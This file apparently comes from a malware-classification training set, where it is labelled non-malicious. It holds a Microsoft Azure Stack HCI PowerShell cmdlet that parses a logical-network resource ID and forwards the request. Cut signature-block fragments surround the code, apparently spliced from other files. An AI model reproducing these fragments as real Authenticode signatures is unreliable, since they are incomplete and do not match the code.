cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIvkvJFS+N0rsU5GJUNXwguk # J6jG0eoyD/MDP0LStdf9MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAe+Bj54wpcyEzIX0GKMpLrVfE6pKOTpyO8hTgKs6dKiE4bUtCI6YLqyqg # BJmLHjLme4ugHzdyRJwMiyhfCji64LGk+fi6bBssvzBvJOC07/gR48D0qeE3OM8Y # +LqlPpiFqATLg43kjsgwsnugo34iwFqyF6M1UkdErusxbofHLGd6Ja9u1y2qEtha # X1BQZH8cfXwBYaeXh0e7kYlEELv+nrXgUQWQdeEIrGwJHTrDvdKivOaBmNAHiUwF # ydI82Ngg04cHxHJcoTzpfqZeaIeGtGkgDdtug+smmCZMIDDNDmDaaif5tCtwwg9P # 60Q2s+iMD9xDmLmh4hOkkT31DOpKs6GCF60wghepBgorBgEEAYI3AwMBMYIXmTCC # F5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDNk2CypbuDDTYbapY03QpuYTmmJAPeSkHHVoNoWRQOEQIGZutwxmYn # GBMyMDI0MTAyODExNDA0NS4wMzNaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAACAdFFWZgQzEJPAAEAAAIBMA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzEyMloXDTI1MTAyMjE4MzEyMlowgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU1MUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtWrf+HzDu7sk50y5YHhe # CIJG0uxRSFFcHNek+Td9ZmyJj20EEjaU8JDJu5pWc4pPAsBI38NEAJ1b+KBnlStq # U8uvXF4qnEShDdi8nPsZZQsTZDKWAgUM2iZTOiWIuZcFs5ZC8/+GlrVLM5h1Y9nf # Mh5B4DnUQOXMremAT9MkvUhg3uaYgmqLlmYyODmba4lXZBu104SLAFsXOfl/TLhp # ToT46y7lI9sbI9uq3/Aerh3aPi2knHvEEazilXeooXNLCwdu+Is6o8kQLouUn3Kw # UQm0b7aUtsv1X/OgPmsOJi6yN3LYWyHISvrNuIrJ4iYNgHdBBumQYK8LjZmQaTKF # acxhmXJ0q2gzaIfxF2yIwM+V9sQqkHkg/Q+iSDNpMr6mr/OwknOEIjI0g6ZMOymi # vpChzDNoPz9hkK3gVHZKW7NV8+UBXN4G0aBX69fKUbxBBLyk2cC+PhOoUjkl6UC8 # /c0huqj5xX8m+YVIk81e7t6I+V/E4yXReeZgr0FhYqNpvTjGcaO2WrkP5XmsYS7I # vMPIf4DCyIJUZaqoBMToAJJHGRe+DPqCHg6bmGPm97MrOWv16/Co6S9cQDkXp9vM # SSRQWXy4KtJhZfmuDz2vr1jw4NeixwuIDGw1mtV/TdSI+vpLJfUiLl/b9w/tJB92 # BALQT8e1YH8NphdOo1xCwkcCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBSwcq9blqLo # PPiVrym9mFmFWbyyUjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAOjQAyz0cVztT # FGqXX5JLRxFK/O/oMe55uDqEC8Vd1gbcM28KBUPgvUIPXm/vdDN2IVBkWHmwCp4A # Icy4dZtkuUmd0fnu6aT9Mvo1ndsLp2YJcMoFLEt3TtriLaO+i4Grv0ZULtWXUPAW # /Mn5Scjgn0xZduGPBD/Xs3J7+get9+8ZvBipsg/N7poimYOVsHxLcem7V5XdMNsy # tTm/uComhM/wgR5KlDYTVNAXBxcSKMeJaiD3V1+HhNkVliMl5VOP+nw5xWF55u9h # 6eF2G7eBPqT+qSFQ+rQCQdIrN0yG1QN9PJroguK+FJQJdQzdfD3RWVsciBygbYaZ # lT1cGJI1IyQ74DQ0UBdTpfeGsyrEQ9PI8QyqVLqb2q7LtI6DJMNphYu+jr//0spr # 1UVvyDPtuRnbGQRNi1COwJcj9OYmlkFgKNeCfbDT7U3uEOvWomekX60Y/m5utRcU # PVeAPdhkB+DxDaev3J1ywDNdyu911nAVPgRkyKgMK3USLG37EdlatDk8FyuCrx4t # iHyqHO3wE6xPw32Q8e/vmuQPoBZuX3qUeoFIsyZEenHq2ScMunhcqW32SUVAi5oZ # 4Z3nf7dAgNau21NEPwgW+2wkrNqDg7Hp8yHyoOKbgEBu6REQbvSfZ5Kh4PV+S2gx # f2uq6GoYDnlqABOMYwz309ISi0bPMh8wggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUA1+26cR/yH100DiNFGWhuAv2rYBqggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJVyEwIhgPMjAyNDEwMjgwMDE5NDVaGA8yMDI0MTAyOTAwMTk0NVowdDA6 # BgorBgEEAYRZCgQBMSwwKjAKAgUA6slXIQIBADAHAgEAAgIBszAHAgEAAgITSjAK # AgUA6sqooQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB # AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQABMN9oWsdpzGRz # tiY54MmqGWUVyuXmaxbDA6z8iE8obpRv+lydBHDEzF+bzjdtPSXWUAH0/FMRRhX0 # teLdCIIacsSa/2bH70CbOdzWv6Q+8mYD34Mes4H/MfoCK+NcUU2sDPmN4LqO/2ey # h0kKM3DzfJuIidm6cvD2YA69CSh85IuoBwIJD3zHB1gawgzN2hPCeSdXzXZoMevJ # N33/MSsU3gjjZk0RGc4Xol2tzHMD3/GkJdRTW7K5OP46vX9QfJzbfGiC4yGAPtbI # Y98+0m5sKTxGYHp9nxOyMAa+aGUH5MqAgXkBYGlW86uWYdQl/cvicZdjgMRYNUkl # FP/zfxppMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAIB0UVZmBDMQk8AAQAAAgEwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqG # SIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgL+lIDBAeHIo7 # YpzmX4kzVUgXDIKpuENQkpibL2YsbrwwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHk # MIG9BCBYa7I6TJQRcmx0HaSTWZdJgowdrl9+Zrr0pIdqHtc4IzCBmDCBgKR+MHwx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p # Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAACAdFFWZgQzEJPAAEAAAIB # MCIEIKMcBulW2TKoXBfoaBGu0S2w65GKyV6YpORLn7xfHyoaMA0GCSqGSIb3DQEB # CwUABIICAC1czbB8QY0x2DYvnvJxBxF6hqT1c4FlH7czqGvHrHeqaZ/LbqGse/Zi # 0r3cmTpG0Qg48sub+47FMhjwMVTnlYjESNyOp6L4CEHNfOlis0ejIgbpmSRfNqrc # LiF2UjEyqhVTWVtwDFMhE8+7UKCYuYKMhp0vy8FKu+Ld989BGFm0ZpP/xbMO3U2p # ZJftCmOnj0cIKP+hvkXAl9zz+LUl2MPiCVPsJUBKaAvrLuGGsE/VThmQbjgTVua4 # wK12ECw8wecOJ2oCfWf55wwhWcmq3W4OezeubcYa75ZuVAentHO/XZmOajI0NrrW # sJv+ralL7y1+TSRMzae1M0AVH03PAvThUvSrrcBddRe8FnTQ2cy7ihZUCnBhr022 # crMExykTrz92x8QWfuENawpNojqAVMHfuKIK3qyQMq93AMuNFh2Gmq7N51DvxWiP # EuhFXafeOUFgS4VnxpyBUkjNnUrS4OwkBlQDCZ77oPX6FHojl1hKGm1sck/iBYjK # saxH7YKiD26lZwcZUrDP8AQtWCyEkSy32YrgGq5Wl26LmaLYx+4tFHonSh6wORxz # pT3jMfcsYtB6NNbuyRM1Zz8kCLu+7QUhNRqm91/rx8iRR6LgGNINuOsXpga9jC5J # SILOnPZU/wGDv1ccJjTb+l13MVR337iMkjv/CDhag19NKzX1mEZJ # SIG # End signature block
combined_dataset/train/non-malicious/sample_33_43.ps1
sample_33_43.ps1
# ---------------------------------------------------------------------------------- # # Copyright Microsoft Corporation # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------------- <# .Synopsis Gets a logical network .Description Gets a logical network .Outputs Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Models.ILogicalNetworks .Link https://learn.microsoft.com/powershell/module/az.stackhcivm/get-azstackhcivmlogicalnetwork #> function Get-AzStackHCIVMLogicalNetwork_ByResourceId { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.StackHciVM.Models.ILogicalNetworks])] [CmdletBinding(PositionalBinding=$false)] param( [Microsoft.Azure.PowerShell.Cmdlets.StackHciVM.Category('Path')] [System.String] # The ARM ID of the logical network. ${ResourceId}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Run the command asynchronously ${NoWait}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { if ($ResourceId -match $lnetRegex){ $subscriptionId = $($Matches['subscriptionId']) $resourceGroupName = $($Matches['resourceGroupName']) $resourceName = $($Matches['logicalNetworkName']) $null = $PSBoundParameters.Remove("ResourceId") $PSBoundParameters.Add("Name", $resourceName) $PSBoundParameters.Add("ResourceGroupName", $resourceGroupName) $null = $PSBoundParameters.Remove("SubscriptionId") $PSBoundParameters.Add("SubscriptionId", $subscriptionId) return Az.StackHCIVM\Get-AzStackHCIVMLogicalNetwork @PSBoundParameters } else { Write-Error "Resource ID is invalid: $ResourceId" } } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB6S7RsV0M+93VD # g01Slg3F+v9WXRnVu+Sf8UlSP+nfgqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # 